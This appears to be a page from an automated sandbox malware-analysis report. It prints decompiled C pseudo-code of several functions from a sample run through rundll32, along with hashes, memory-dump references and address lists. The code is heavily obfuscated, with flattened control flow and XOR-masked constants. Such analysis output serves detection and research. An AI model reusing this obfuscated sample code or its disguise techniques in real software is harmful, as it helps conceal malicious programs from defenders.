Associated: 00000009.00000002.460235744.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460243520.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460248407.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460253343.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: State$LongMessageSendWindow
String ID:
API String ID: 1063413437-0
Opcode ID: cbe92a3c8afafbb230f3664375f9361b4519f62e794af51cea28ccd5527820e8
Instruction ID: b089c7fc05c7e6fbdd4fc06f52c570ea12a8721339fdd196cb0bdf3cbec2e35a
Opcode Fuzzy Hash: cbe92a3c8afafbb230f3664375f9361b4519f62e794af51cea28ccd5527820e8
Instruction Fuzzy Hash: F6F0E97679075A27EB20BA744CC1F9A0154DF89BD9F028534B741EE0D3DBB0C8819170

Uniqueness

Uniqueness Score: -1.00%

Function 003520BA Relevance: 5.2, Strings: 4, Instructions: 240
COMMONCrypto

Download Yara Rule

C-Code - Quality: 76%

			E003520BA() {
				char _v520;
				signed int _v524;
				unsigned int _v528;
				signed int _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				signed int _v616;
				signed int _v620;
				signed int _v624;
				signed int _t227;
				intOrPtr _t228;
				signed int _t230;
				void* _t231;
				intOrPtr _t235;
				intOrPtr _t245;
				void* _t247;
				intOrPtr _t254;
				signed int _t272;
				signed int _t273;
				signed int _t274;
				signed int _t275;
				void* _t277;
				signed int* _t279;
				void* _t283;

				_t279 =  &_v624;
				_v612 = 0x15bebb;
				_v612 = _v612 ^ 0x0c09d82a;
				_t247 = 0x7e01d7;
				_v612 = _v612 + 0xffff69e9;
				_v612 = _v612 ^ 0xcffb1e8d;
				_v612 = _v612 ^ 0xc3e0ceeb;
				_v596 = 0xb5bc7f;
				_v596 = _v596 << 0xa;
				_v596 = _v596 + 0xbaa7;
				_v596 = _v596 ^ 0xd6f2b68e;
				_v600 = 0x5909af;
				_v600 = _v600 ^ 0x0096463d;
				_v600 = _v600 >> 3;
				_v600 = _v600 ^ 0x0016e9cd;
				_v548 = 0x801d18;
				_v548 = _v548 + 0xffffc800;
				_v548 = _v548 ^ 0x0070ca5a;
				_v580 = 0x2361dd;
				_v580 = _v580 * 0x6f;
				_t277 = 0;
				_v580 = _v580 << 0xe;
				_v580 = _v580 ^ 0xdbb34e1e;
				_v528 = 0x864281;
				_v528 = _v528 >> 0xc;
				_v528 = _v528 ^ 0x0000b217;
				_v560 = 0x478502;
				_v560 = _v560 | 0x3d47d1eb;
				_v560 = _v560 ^ 0x3d4c1a49;
				_v540 = 0x8f961f;
				_v540 = _v540 >> 0xc;
				_v540 = _v540 ^ 0x000d133d;
				_v572 = 0xef4b2;
				_v572 = _v572 << 0xd;
				_v572 = _v572 + 0xffff85b1;
				_v572 = _v572 ^ 0xde949f86;
				_v608 = 0x8e969a;
				_v608 = _v608 << 0xd;
				_t272 = 0x21;
				_v608 = _v608 / _t272;
				_t273 = 0x2f;
				_v608 = _v608 / _t273;
				_v608 = _v608 ^ 0x002a10b8;
				_v620 = 0x864bbd;
				_v620 = _v620 << 0x10;
				_v620 = _v620 + 0x87ba;
				_v620 = _v620 + 0x936f;
				_v620 = _v620 ^ 0x4bb78bcc;
				_v564 = 0xfb8a17;
				_t274 = 0x62;
				_v564 = _v564 * 0x63;
				_v564 = _v564 ^ 0x61429d97;
				_v576 = 0x222f;
				_v576 = _v576 >> 4;
				_v576 = _v576 ^ 0xf39884cf;
				_v576 = _v576 ^ 0xf39d4647;
				_v556 = 0x6068cb;
				_v556 = _v556 ^ 0xfe1a734d;
				_v556 = _v556 ^ 0xfe79d9b4;
				_v616 = 0xc46e23;
				_v616 = _v616 >> 2;
				_v616 = _v616 / _t274;
				_v616 = _v616 * 0x76;
				_v616 = _v616 ^ 0x003e2a5a;
				_v624 = 0x4617e4;
				_v624 = _v624 + 0xffff4d74;
				_v624 = _v624 ^ 0x9dcdfd87;
				_v624 = _v624 + 0x3fd8;
				_v624 = _v624 ^ 0x9d89a5c2;
				_v588 = 0x3a0167;
				_v588 = _v588 << 1;
				_v588 = _v588 + 0xffff1a51;
				_v588 = _v588 ^ 0x00728a40;
				_v532 = 0x3a363e;
				_v532 = _v532 ^ 0xe52a74a2;
				_v532 = _v532 ^ 0xe514694b;
				_v544 = 0x52d5cb;
				_v544 = _v544 | 0x185d0a08;
				_v544 = _v544 ^ 0x18524fe5;
				_v584 = 0x37b3aa;
				_v584 = _v584 + 0xebef;
				_t275 = 0x72;
				_v584 = _v584 * 0x28;
				_v584 = _v584 ^ 0x08d0b087;
				_v592 = 0xa4bebe;
				_v592 = _v592 >> 8;
				_v592 = _v592 | 0x739fbd45;
				_v592 = _v592 ^ 0x739593e3;
				_v552 = 0x17b1c;
				_v552 = _v552 << 0xe;
				_v552 = _v552 ^ 0x5ecd7403;
				_v568 = 0x403d75;
				_v568 = _v568 >> 3;
				_v568 = _v568 | 0x80b15bc0;
				_v568 = _v568 ^ 0x80b9a416;
				_v536 = 0x2ed64e;
				_t276 = _v524;
				_v536 = _v536 / _t275;
				_v536 = _v536 ^ 0x00033d67;
				_v604 = 0x8b403d;
				_v604 = _v604 + 0xffff3866;
				_v604 = _v604 << 8;
				_v604 = _v604 ^ 0x8a7a6cd3;
				goto L1;
				do {
					while(1) {
						L1:
						_t283 = _t247 - 0x73dad95;
						if(_t283 > 0) {
							break;
						}
						if(_t283 == 0) {
							E0035DA22(_v544, _v584, __eflags, _v592,  &_v520, _t247, _v552);
							_t235 = E00342051(_v536,  &_v520, _v604);
							_t254 =  *0x363e10; // 0x0
							 *((intOrPtr*)(_t254 + 0x10)) = _t235;
						} else {
							if(_t247 == 0x7e01d7) {
								_push(_t247);
								_push(_t247);
								 *0x363e10 = E00347FF2(0x45c);
								_t247 = 0x8643fcd;
								continue;
							} else {
								if(_t247 == 0xd34913) {
									_t247 = 0x148c4fa;
									_v524 = _v596;
									continue;
								} else {
									if(_t247 == 0xfeb697) {
										_v524 = _v612;
										goto L8;
									} else {
										if(_t247 != 0x148c4fa) {
											goto L20;
										} else {
											E00358F9E(_v620, _v564, _v576, _v556, _t276);
											_t279 =  &(_t279[3]);
											L8:
											_t247 = 0xac90332;
											continue;
										}
									}
								}
							}
						}
						L23:
						return _t277;
					}
					__eflags = _t247 - 0x8643fcd;
					if(_t247 == 0x8643fcd) {
						_t227 = E0034912C(_v600, _v560, _t247, _v540, _t247, _v572, _v608);
						_t276 = _t227;
						_t279 =  &(_t279[5]);
						__eflags = _t227;
						if(__eflags == 0) {
							_t247 = 0xfeb697;
							goto L20;
						} else {
							_t245 =  *0x363e10; // 0x0
							 *((intOrPtr*)(_t245 + 0x450)) = 1;
							_t247 = 0xd34913;
							goto L1;
						}
					} else {
						__eflags = _t247 - 0xac90332;
						if(_t247 == 0xac90332) {
							_push(_v532);
							_push(_v524);
							_push(_v588);
							_t228 =  *0x363e10; // 0x0
							_push(_t228 + 0x23c);
							_t230 = E003546BB(_v616, _v624);
							_t279 = _t279 - 0xc + 0x1c;
							_t247 = 0xe2d9513;
							__eflags = _t230;
							_t231 = 1;
							_t277 =  ==  ? _t231 : _t277;
							goto L1;
						} else {
							__eflags = _t247 - 0xe2d9513;
							if(_t247 != 0xe2d9513) {
								goto L20;
							} else {
								E0034A55F();
								_t247 = 0x73dad95;
								goto L1;
							}
						}
					}
					goto L23;
					L20:
					__eflags = _t247 - 0x13a2d4a;
				} while (__eflags != 0);
				goto L23;
			}

0x003520ba
0x003520c0
0x003520ca
0x003520d2
0x003520d7
0x003520df
0x003520e7
0x003520ef
0x003520f7
0x003520fc
0x00352104
0x0035210c
0x00352114
0x0035211c
0x00352121
0x00352129
0x00352131
0x00352139
0x00352141
0x00352152
0x00352156
0x00352158
0x0035215d
0x00352165
0x0035216d
0x00352172
0x0035217a
0x00352182
0x0035218a
0x00352192
0x0035219a
0x0035219f
0x003521a7
0x003521af
0x003521b4
0x003521bc
0x003521c4
0x003521cc
0x003521d7
0x003521dc
0x003521e6
0x003521eb
0x003521f1
0x003521f9
0x00352201
0x00352206
0x0035220e
0x00352216
0x0035221e
0x0035222b
0x0035222c
0x00352230
0x00352238
0x00352240
0x00352245
0x0035224d
0x00352255
0x0035225d
0x00352265
0x0035226d
0x00352275
0x00352280
0x00352289
0x0035228d
0x00352297
0x003522a4
0x003522b1
0x003522b9
0x003522c1
0x003522c9
0x003522d1
0x003522d5
0x003522dd
0x003522e5
0x003522ed
0x003522f5
0x003522fd
0x00352305
0x0035230d
0x00352315
0x0035231d
0x0035232c
0x0035232d
0x00352331
0x00352339
0x00352341
0x00352346
0x0035234e
0x00352356
0x0035235e
0x00352363
0x0035236b
0x00352373
0x00352378
0x00352380
0x00352388
0x00352396
0x0035239a
0x0035239e
0x003523a6
0x003523ae
0x003523b6
0x003523bb
0x003523bb
0x003523c3
0x003523c3
0x003523c3
0x003523c3
0x003523c5
0x00000000
0x00000000
0x003523cb
0x00352519
0x00352532
0x00352537
0x00352540
0x003523d1
0x003523d7
0x0035243c
0x0035243d
0x00352445
0x0035244a
0x00000000
0x003523d9
0x003523df
0x00352420
0x00352425
0x00000000
0x003523e1
0x003523e7
0x00352416
0x00000000
0x003523e9
0x003523ef
0x00000000
0x003523f5
0x00352406
0x0035240b
0x0035240e
0x0035240e
0x00000000
0x0035240e
0x003523ef
0x003523e7
0x003523df
0x003523d7
0x00352544
0x0035254f
0x0035254f
0x00352454
0x0035245a
0x003524ca
0x003524cf
0x003524d1
0x003524d4
0x003524d6
0x003524f0
0x00000000
0x003524d8
0x003524d8
0x003524e0
0x003524e6
0x00000000
0x003524e6
0x0035245c
0x0035245c
0x0035245e
0x00352478
0x0035247c
0x00352480
0x00352484
0x00352499
0x0035249a
0x0035249f
0x003524a2
0x003524a7
0x003524ab
0x003524ac
0x00000000
0x00352460
0x00352460
0x00352466
0x00000000
0x0035246c
0x0035246c
0x00352471
0x00000000
0x00352471
0x00352466
0x0035245e
0x00000000
0x003524f5
0x003524f5
0x003524f5
0x00000000

Strings

>6:, xrefs: 003522E5
Z*>, xrefs: 0035228D
/", xrefs: 00352238
u=@, xrefs: 0035236B

Memory Dump Source

Source File: 00000009.00000002.460122857.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true

Associated: 00000009.00000002.460117697.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.460138899.0000000000363000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_340000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: /"$>6:$Z*>$u=@
API String ID: 0-89199335
Opcode ID: 606122b0aecca0be700b419039babb5cc3bb24dbaebbce535da7bad1f0eacc72
Instruction ID: a54a9262d079f0c3378e2979c802b7c2dde46c5ad13204f8577e0f8a0d4648c4
Opcode Fuzzy Hash: 606122b0aecca0be700b419039babb5cc3bb24dbaebbce535da7bad1f0eacc72
Instruction Fuzzy Hash: E9B101B11083809FC759CF66C48A81BFBE1FBD5748F10991DF6A28A261D3B5C949CF92

Uniqueness

Uniqueness Score: -1.00%

Function 00345548 Relevance: 5.2, Strings: 4, Instructions: 233
COMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E00345548(void* __edx, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				char _v16;
				intOrPtr _v24;
				char _v28;
				char _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				char _v64;
				signed int _v68;
				char _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				unsigned int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				void* __ecx;
				void* _t190;
				void* _t206;
				void* _t208;
				signed int _t209;
				char* _t211;
				signed int _t212;
				intOrPtr _t222;
				intOrPtr* _t225;
				void* _t227;
				char* _t229;
				char _t233;
				intOrPtr _t255;
				intOrPtr* _t257;
				signed int _t258;
				signed int _t259;
				signed int _t260;
				signed int* _t263;

				_t225 = _a16;
				_t257 = _a4;
				_push(_t225);
				_push(_a12);
				_push(_a8);
				_push(_t257);
				_push(__edx);
				E003520B9(_t190);
				_v56 = 0xb9e7cb;
				_t255 = 0;
				_v52 = 0x6e87b5;
				_t263 =  &(( &_v148)[6]);
				_v48 = 0;
				_v44 = 0;
				_t227 = 0x3ccc1e9;
				_v128 = 0x85629b;
				_t258 = 0x62;
				_v128 = _v128 * 0x5a;
				_v128 = _v128 + 0xfbaf;
				_v128 = _v128 ^ 0x2ee5a62d;
				_v144 = 0xfc0c7f;
				_v144 = _v144 ^ 0xfdfaf442;
				_v144 = _v144 >> 1;
				_v144 = _v144 | 0x14143ad1;
				_v144 = _v144 ^ 0x7e977ecf;
				_v96 = 0xd1f565;
				_v96 = _v96 * 0x21;
				_v96 = _v96 ^ 0x1b12de47;
				_v104 = 0xb219e8;
				_v104 = _v104 | 0x75a31cc8;
				_v104 = _v104 ^ 0x75be6df4;
				_v80 = 0x6fb9b6;
				_v80 = _v80 * 0x3e;
				_v80 = _v80 ^ 0x1b001c4a;
				_v132 = 0x1154a0;
				_v132 = _v132 << 0xb;
				_v132 = _v132 + 0xfffffde8;
				_v132 = _v132 | 0xd1d436bb;
				_v132 = _v132 ^ 0xdbfeae5a;
				_v76 = 0x5374cd;
				_v76 = _v76 << 2;
				_v76 = _v76 ^ 0x0147cb67;
				_v140 = 0x35e68a;
				_v140 = _v140 + 0xffff467d;
				_v140 = _v140 * 0x7c;
				_v140 = _v140 ^ 0x566bba39;
				_v140 = _v140 ^ 0x4faa8078;
				_v124 = 0xf91357;
				_v124 = _v124 << 0xf;
				_v124 = _v124 + 0xf2e4;
				_v124 = _v124 ^ 0x89afe8a4;
				_v112 = 0xf055e4;
				_v112 = _v112 ^ 0x101963ca;
				_v112 = _v112 | 0x7be8ad21;
				_v112 = _v112 ^ 0x7be17431;
				_v84 = 0x17393b;
				_v84 = _v84 << 6;
				_v84 = _v84 ^ 0x05c81c43;
				_v120 = 0xf688ab;
				_v120 = _v120 / _t258;
				_v120 = _v120 * 0x2d;
				_v120 = _v120 ^ 0x00718a36;
				_v116 = 0xa21f51;
				_v116 = _v116 + 0x3c3b;
				_v116 = _v116 >> 0xa;
				_v116 = _v116 ^ 0x0006c391;
				_v88 = 0x51e239;
				_v88 = _v88 + 0x2ec0;
				_v88 = _v88 ^ 0x0058dd2b;
				_v136 = 0xa92d92;
				_v136 = _v136 >> 0xd;
				_v136 = _v136 ^ 0x0647b396;
				_v136 = _v136 ^ 0x20b7ff2f;
				_v136 = _v136 ^ 0x26fd7475;
				_v108 = 0xb50576;
				_t259 = 0x45;
				_v108 = _v108 / _t259;
				_v108 = _v108 ^ 0xb94dc178;
				_v108 = _v108 ^ 0xb943792d;
				_v148 = 0xb9b260;
				_t260 = 0x14;
				_v148 = _v148 / _t260;
				_v148 = _v148 * 0x3f;
				_v148 = _v148 >> 2;
				_v148 = _v148 ^ 0x009e914b;
				_v92 = 0x6e7d65;
				_v92 = _v92 | 0xb573042f;
				_v92 = _v92 ^ 0xb570b7bc;
				_v100 = 0xfd8f7e;
				_v100 = _v100 * 0x5d;
				_v100 = _v100 ^ 0x5c1db3f3;
				L1:
				while(_t227 != 0x3c16ad4) {
					if(_t227 == 0x3ccc1e9) {
						_t227 = 0x7dbf5b4;
						continue;
					}
					if(_t227 == 0x79abc1a) {
						_t229 =  &_v28;
						_t208 = E0034AEFB(_t229, _v124, _v112, _v84,  &_v16, _v120);
						_t263 =  &(_t263[4]);
						if(_t208 != 0) {
							_push(_t229);
							_push(_t229);
							_t222 = E00347FF2(_v24);
							 *_t257 = _t222;
							if(_t222 != 0) {
								E0034ED7E(_v108,  *_t257, _v148, _v28, _v24);
								_t263 =  &(_t263[3]);
								 *((intOrPtr*)(_t257 + 4)) = _v24;
								_t255 = 1;
							}
						}
						_t227 = 0xdaef9d5;
						continue;
					}
					if(_t227 == 0x7dbf5b4) {
						_t209 =  *((intOrPtr*)(_t225 + 4));
						_t233 =  *_t225;
						_v68 = _t209;
						_v72 = _t233;
						_t211 = _t209 - 1 + _t233;
						while(_t211 > _t233) {
							if( *_t211 == 0) {
								break;
							}
							_t211 = _t211 - 1;
						}
						_t212 = _t211 - _t233;
						_v68 = _t212;
						if(_t212 == 0) {
							L16:
							_t227 = 0xfc35b14;
							continue;
						}
						while(_v68 % _v144 != _v128) {
							_t163 =  &_v68;
							 *_t163 = _v68 - 1;
							if( *_t163 != 0) {
								continue;
							}
							goto L16;
						}
						goto L16;
					}
					if(_t227 == 0xdaef9d5) {
						E00358519(_v92, _v100, _v64);
						L28:
						return _t255;
					}
					if(_t227 != 0xfc35b14) {
						L25:
						if(_t227 != 0xb843ed5) {
							continue;
						}
						goto L28;
					}
					if(E00345E60( &_v72, _v96, _v104,  &_v64) == 0) {
						goto L28;
					}
					_t227 = 0x3c16ad4;
				}
				_t206 = E00348B3D( &_v40, _v80, _v132,  &_v64, _v76, _v140);
				_t263 =  &(_t263[4]);
				if(_t206 == 0) {
					_t227 = 0xdaef9d5;
					goto L25;
				}
				_t227 = 0x79abc1a;
				goto L1;
			}

0x0034554f
0x00345558
0x00345560
0x00345561
0x00345568
0x0034556f
0x00345570
0x00345572
0x00345577
0x00345582
0x00345584
0x0034558f
0x00345592
0x00345598
0x0034559c
0x003455a1
0x003455b0
0x003455b1
0x003455b5
0x003455bd
0x003455c5
0x003455cd
0x003455d5
0x003455d9
0x003455e1
0x003455e9
0x003455f6
0x003455fa
0x00345602
0x0034560a
0x00345612
0x0034561a
0x00345627
0x0034562b
0x00345633
0x0034563b
0x00345640
0x00345648
0x00345650
0x00345658
0x00345660
0x00345665
0x0034566d
0x00345675
0x00345682
0x00345686
0x0034568e
0x00345696
0x0034569e
0x003456a3
0x003456ab
0x003456b3
0x003456bb
0x003456c3
0x003456cb
0x003456d3
0x003456db
0x003456e0
0x003456e8
0x003456f6
0x003456ff
0x00345703
0x0034570b
0x00345713
0x0034571b
0x00345720
0x00345728
0x00345730
0x0034573a
0x00345742
0x0034574a
0x0034574f
0x00345757
0x0034575f
0x00345767
0x00345775
0x0034577a
0x00345780
0x00345788
0x00345790
0x0034579c
0x003457a4
0x003457ad
0x003457b1
0x003457b6
0x003457be
0x003457c6
0x003457ce
0x003457d6
0x003457e3
0x003457e7
0x00000000
0x003457ef
0x00345801
0x0034591d
0x00000000
0x0034591d
0x0034580d
0x003458ac
0x003458bb
0x003458c0
0x003458c5
0x003458da
0x003458db
0x003458dc
0x003458e1
0x003458e7
0x00345901
0x0034590f
0x00345912
0x00345915
0x00345915
0x003458e7
0x00345916
0x00000000
0x00345916
0x00345819
0x00345856
0x00345859
0x0034585b
0x00345860
0x00345864
0x0034586e
0x0034586b
0x00000000
0x00000000
0x0034586d
0x0034586d
0x00345872
0x00345874
0x00345878
0x00345892
0x00345892
0x00000000
0x00345892
0x0034587a
0x0034588c
0x0034588c
0x00345890
0x00000000
0x00000000
0x00000000
0x00345890
0x00000000
0x0034587a
0x0034581d
0x00345975
0x0034597b
0x00345987
0x00345987
0x00345829
0x0034595b
0x00345961
0x00000000
0x00000000
0x00000000
0x00345967
0x00345849
0x00000000
0x00000000
0x0034584f
0x0034584f
0x00345943
0x00345948
0x0034594d
0x00345959
0x00000000
0x00345959
0x0034594f
0x00000000

Strings

1t{, xrefs: 003456CB
;<, xrefs: 00345713
9Q, xrefs: 00345728
e}n, xrefs: 003457BE

Memory Dump Source

Source File: 00000009.00000002.460122857.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true

Associated: 00000009.00000002.460117697.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.460138899.0000000000363000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_340000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: 1t{$9Q$;<$e}n
API String ID: 0-2095593254
Opcode ID: 3e729f004d8ed529ecf323f69a5bd049de09d4616ed983f039155076c9e898ed
Instruction ID: 4ac54a5dbd28b3836f58270284acd06c6c6aafe6001a5562711b065e67f94713
Opcode Fuzzy Hash: 3e729f004d8ed529ecf323f69a5bd049de09d4616ed983f039155076c9e898ed
Instruction Fuzzy Hash: 9EB150B1508381DFC329CF22C58591BBBF2FBC4748F10891DF69A9A261D7B19A49CF42

Uniqueness

Uniqueness Score: -1.00%

Function 00357DD5 Relevance: 5.2, Strings: 4, Instructions: 226
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E00357DD5() {
				char _v520;
				char _v1040;
				signed int _v1044;
				signed int _v1048;
				intOrPtr _v1052;
				intOrPtr _v1056;
				unsigned int _v1060;
				signed int _v1064;
				signed int _v1068;
				signed int _v1072;
				signed int _v1076;
				signed int _v1080;
				signed int _v1084;
				signed int _v1088;
				signed int _v1092;
				signed int _v1096;
				signed int _v1100;
				signed int _v1104;
				signed int _v1108;
				signed int _v1112;
				signed int _v1116;
				signed int _v1120;
				signed int _v1124;
				signed int _v1128;
				signed int _v1132;
				signed int _v1136;
				signed int _v1140;
				signed int _v1144;
				signed int _v1148;
				signed int _v1152;
				signed int _v1156;
				intOrPtr _t236;
				void* _t241;
				short* _t244;
				void* _t247;
				void* _t250;
				intOrPtr _t256;
				intOrPtr _t272;
				signed int _t278;
				signed int _t279;
				signed int _t280;
				signed int* _t283;

				_t283 =  &_v1156;
				_v1048 = _v1048 & 0x00000000;
				_v1044 = _v1044 & 0x00000000;
				_t250 = 0x1242b9;
				_v1056 = 0xc74a30;
				_v1052 = 0xdc93e6;
				_v1140 = 0x94ae82;
				_v1140 = _v1140 * 0x5d;
				_v1140 = _v1140 | 0xd08f5b59;
				_t278 = 0x3b;
				_v1140 = _v1140 / _t278;
				_v1140 = _v1140 ^ 0x042b78b4;
				_v1060 = 0xf2c7d8;
				_v1060 = _v1060 >> 0xe;
				_v1060 = _v1060 ^ 0x000b32e4;
				_v1084 = 0xadf7c1;
				_v1084 = _v1084 >> 7;
				_v1084 = _v1084 ^ 0x0005ae79;
				_v1068 = 0x4ca2f2;
				_v1068 = _v1068 | 0x7f3e9315;
				_v1068 = _v1068 ^ 0x7f77e091;
				_v1148 = 0xfaa01c;
				_v1148 = _v1148 | 0x0a84fcb5;
				_t279 = 0x3d;
				_v1148 = _v1148 / _t279;
				_v1148 = _v1148 + 0xffff92ee;
				_v1148 = _v1148 ^ 0x0020489e;
				_v1104 = 0xbd50a4;
				_v1104 = _v1104 | 0x802f8c80;
				_v1104 = _v1104 ^ 0xe2a4d8db;
				_v1104 = _v1104 ^ 0x621899e9;
				_v1096 = 0x4ec4a;
				_t280 = 0x27;
				_v1096 = _v1096 / _t280;
				_v1096 = _v1096 ^ 0x000ca7f0;
				_v1156 = 0x496e13;
				_v1156 = _v1156 << 0xb;
				_v1156 = _v1156 + 0xffff34c4;
				_v1156 = _v1156 ^ 0xea67072b;
				_v1156 = _v1156 ^ 0xa10c07e0;
				_v1132 = 0x5417d7;
				_v1132 = _v1132 ^ 0x2d0a29d3;
				_v1132 = _v1132 * 0x11;
				_v1132 = _v1132 ^ 0x95d68b4c;
				_v1132 = _v1132 ^ 0x969bce68;
				_v1108 = 0x3d434d;
				_t83 =  &_v1108; // 0x3d434d
				_v1108 =  *_t83 * 0x5d;
				_v1108 = _v1108 + 0xbd1d;
				_v1108 = _v1108 ^ 0x16426462;
				_v1064 = 0x905f90;
				_v1064 = _v1064 << 7;
				_v1064 = _v1064 ^ 0x482aff2b;
				_v1076 = 0xa70fe8;
				_v1076 = _v1076 ^ 0x0f6696b3;
				_v1076 = _v1076 ^ 0x0fce7292;
				_v1144 = 0x5add64;
				_v1144 = _v1144 * 0x72;
				_v1144 = _v1144 >> 2;
				_v1144 = _v1144 + 0xffffbbe0;
				_v1144 = _v1144 ^ 0x0a105df6;
				_v1112 = 0xa934e1;
				_v1112 = _v1112 + 0xffff3dc6;
				_v1112 = _v1112 ^ 0xf71e7087;
				_v1112 = _v1112 ^ 0xf7bbdd65;
				_v1152 = 0xfe7bab;
				_v1152 = _v1152 + 0xffffe121;
				_v1152 = _v1152 << 7;
				_v1152 = _v1152 + 0xffffae88;
				_v1152 = _v1152 ^ 0x7f211c18;
				_v1092 = 0x242707;
				_v1092 = _v1092 >> 6;
				_v1092 = _v1092 ^ 0x0003c6d8;
				_v1136 = 0xebac4f;
				_v1136 = _v1136 + 0x4c15;
				_v1136 = _v1136 >> 0xf;
				_v1136 = _v1136 ^ 0xdf38e0e8;
				_v1136 = _v1136 ^ 0xdf3b1dfc;
				_v1120 = 0x4eb7ab;
				_v1120 = _v1120 << 2;
				_v1120 = _v1120 + 0xffff85cc;
				_v1120 = _v1120 ^ 0x01347c50;
				_v1088 = 0xc2f923;
				_v1088 = _v1088 * 0xf;
				_v1088 = _v1088 ^ 0x0b6c1f22;
				_v1080 = 0xbf02c1;
				_v1080 = _v1080 + 0xffffcd4c;
				_v1080 = _v1080 ^ 0x00bd8b7d;
				_v1128 = 0xfef10;
				_v1128 = _v1128 + 0xfa25;
				_v1128 = _v1128 + 0xffffb342;
				_v1128 = _v1128 + 0x2fe7;
				_v1128 = _v1128 ^ 0x00107547;
				_v1116 = 0x30091d;
				_v1116 = _v1116 | 0x682f5e67;
				_v1116 = _v1116 * 0xf;
				_v1116 = _v1116 ^ 0x1bb1960a;
				_v1100 = 0xdd7fbe;
				_v1100 = _v1100 >> 0xf;
				_v1100 = _v1100 + 0xffff26d4;
				_v1100 = _v1100 ^ 0xfff0a895;
				_v1072 = 0xd8d782;
				_v1072 = _v1072 + 0xffff857d;
				_v1072 = _v1072 ^ 0x00daabd2;
				_v1124 = 0x615b7c;
				_v1124 = _v1124 >> 0x10;
				_v1124 = _v1124 * 0x3d;
				_v1124 = _v1124 ^ 0x000147a1;
				L1:
				while(_t250 != 0x1242b9) {
					if(_t250 == 0x56337fc) {
						E00356C49(_v1144, _v1112, _v1152, _v1092,  &_v520);
						_push(_v1088);
						_push( &_v520);
						_push(_v1120);
						E003613AD(_v1136,  &_v1040, __eflags);
						_t283 =  &(_t283[6]);
						_t250 = 0x8d6676f;
						continue;
					}
					if(_t250 == 0x5f94146) {
						_push(_v1148);
						_push(_v1068);
						_t241 = E0035DCF7(_v1084, 0x341000, __eflags);
						_t256 =  *0x363e10; // 0x0
						_t272 =  *0x363e10; // 0x0
						E003447CE(_t272 + 0x23c, _v1104, _t256 + 0x1c, _v1096, _v1156, _t241, _t256 + 0x1c, _v1132, _v1108);
						E0034A8B0(_v1064, _t241, _v1076);
						_t283 =  &(_t283[9]);
						_t250 = 0x56337fc;
						continue;
					}
					if(_t250 == 0x8d6676f) {
						_t244 = E0034B6CF( &_v1040, _v1080, _v1128, _v1116);
						__eflags = 0;
						 *_t244 = 0;
						return E0034B1C6( &_v1040, _v1100, _v1072, _v1124);
					}
					if(_t250 == 0xbcbde3e) {
						_t247 = E0035473C();
						L8:
						_t250 = 0x5f94146;
						continue;
					}
					if(_t250 != 0xf4317dc) {
						L15:
						__eflags = _t250 - 0xfb0317f;
						if(__eflags != 0) {
							continue;
						}
						return _t247;
					}
					_t247 = E00343E3F();
					goto L8;
				}
				_t236 =  *0x363e10; // 0x0
				__eflags =  *((intOrPtr*)(_t236 + 0x450));
				if(__eflags == 0) {
					_t250 = 0xf4317dc;
					goto L15;
				}
				_t250 = 0xbcbde3e;
				goto L1;
			}

0x00357dd5
0x00357ddb
0x00357de2
0x00357de7
0x00357dec
0x00357df4
0x00357dfc
0x00357e0d
0x00357e11
0x00357e1f
0x00357e24
0x00357e2a
0x00357e32
0x00357e3a
0x00357e3f
0x00357e47
0x00357e4f
0x00357e54
0x00357e5c
0x00357e64
0x00357e6c
0x00357e74
0x00357e7c
0x00357e88
0x00357e8d
0x00357e93
0x00357e9b
0x00357ea3
0x00357eab
0x00357eb3
0x00357ebb
0x00357ec3
0x00357ecf
0x00357ed2
0x00357ed6
0x00357ede
0x00357ee6
0x00357eeb
0x00357ef3
0x00357efb
0x00357f03
0x00357f0b
0x00357f18
0x00357f1c
0x00357f24
0x00357f2c
0x00357f34
0x00357f39
0x00357f3d
0x00357f45
0x00357f4d
0x00357f55
0x00357f5a
0x00357f62
0x00357f6a
0x00357f72
0x00357f7a
0x00357f87
0x00357f8b
0x00357f90
0x00357f98
0x00357fa0
0x00357fa8
0x00357fb0
0x00357fbd
0x00357fca
0x00357fd7
0x00357fdf
0x00357fe4
0x00357fec
0x00357ff4
0x00357ffc
0x00358001
0x00358009
0x00358011
0x00358019
0x0035801e
0x00358026
0x0035802e
0x00358036
0x0035803b
0x00358043
0x0035804b
0x00358058
0x0035805c
0x00358064
0x0035806c
0x00358074
0x0035807c
0x00358084
0x0035808c
0x00358094
0x0035809c
0x003580a4
0x003580ac
0x003580b9
0x003580bd
0x003580c5
0x003580cd
0x003580d2
0x003580da
0x003580e2
0x003580ea
0x003580f2
0x003580fa
0x00358102
0x0035810c
